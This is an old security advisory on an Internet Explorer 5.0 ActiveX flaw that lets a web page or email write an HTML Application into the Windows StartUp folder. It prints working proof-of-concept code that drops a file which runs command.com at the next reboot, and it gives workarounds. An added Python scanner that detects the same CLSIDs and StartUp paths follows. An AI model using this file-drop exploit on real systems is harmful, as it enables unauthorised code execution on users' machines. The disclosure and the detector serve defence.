Internet Explorer 5.0 under Windows 95/98 (don't know about NT) allows executing arbitrary programs on the local machine by creating and overwriting local files and putting content in them.
Details:
The problem is the ActiveX control "Object for constructing type libraries for scriptlets", which can create and overwrite local files.
The control puts some unneeded information in the file it writes, but part of the content may be chosen.
So, an HTML Application file may be created, fed with exploit information and written to the StartUp folder.
The next time the user reboots (which may be forced), the code in the HTML Application file will be executed.
This vulnerability can be exploited via email.
Workaround:
Disable Active Scripting
or
Disable Run ActiveX Controls and plug-ins
Go to Control Panel -- Internet Options and click the 'Security' tab. Click 'Internet' and then the 'Custom level' button on the bottom.
Personal note:
Java has security problems too; also, banner ad companies have started to download Java programs to your hard disk, so you'll never miss an advertisement. That, plus the fact that Java causes Windows to crash on all of my Pentium computers, has made me disable it. Java is supposed to run in what they call a 'sandbox,' which should be safe, but exploits have already been written and are circulating.
The code is:
<object id="scr"
classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
>
</object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\krkosska.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert('You have been infected by kevin! etc. ');wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</SCRIPT>
Delete the file 'krkosska.hta' from your C:\WINDOWS\Start Menu\Programs\StartUp folder after you're done.
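A defensive check for the pattern shown above, added here as an example (it is not part of the original advisory): a Python scanner that flags HTML pages or HTML mail bodies which instantiate either CLSID from the demonstration code, carry one inside a script string, or name a file under a StartUp folder in script source. The names scan_html, FLAGGED and SAMPLE are assumptions made for this example, and the sample input is constructed.

```python
import re
from html.parser import HTMLParser
# CLSIDs exactly as they appear in the advisory's demonstration code.
FLAGGED = {
    "06290BD5-48AA-11D2-8432-006008C3FBFC": "type-library constructor that writes the file",
    "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B": "object whose Run() the written file calls",
}
CLSID_RE = re.compile(r"clsid:\s*\{?([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})\}?", re.I)
# A file named under a StartUp folder inside script source (backslashes may be doubled).
STARTUP_RE = re.compile(r"start\s*menu[\\/]+programs[\\/]+startup[\\/]+[^\\/\"']+", re.I)

class _Scanner(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings, self.script, self.in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
        elif tag == "object":
            # Attribute values arrive entity-decoded, so "clsid&#58;..." is caught too.
            m = CLSID_RE.search(dict(attrs).get("classid") or "")
            if m and m.group(1).upper() in FLAGGED:
                self.findings.append(("object-tag", m.group(1).upper()))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.script.append(data)  # script text may arrive in several chunks

def scan_html(text):
    """Return (kind, detail) findings for one HTML page or HTML mail body."""
    p = _Scanner()
    p.feed(text)
    p.close()
    script = "".join(p.script)
    for m in CLSID_RE.finditer(script):  # second-stage markup hidden in a string
        if m.group(1).upper() in FLAGGED:
            p.findings.append(("clsid-in-script-string", m.group(1).upper()))
    p.findings += [("startup-path-in-script", m.group(0)) for m in STARTUP_RE.finditer(script)]
    return p.findings

# Constructed sample (not a captured message): mixed case and an entity-encoded colon.
SAMPLE = r'''<OBJECT id="a" classid="clsid&#58;06290bd5-48aa-11d2-8432-006008c3fbfc"></OBJECT>
<script>a.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\sample.hta";
a.Doc="<object id='b' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>";</script>'''
```

Calling scan_html(SAMPLE) returns three findings: the object tag, the second CLSID carried inside the script string, and the StartUp path.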
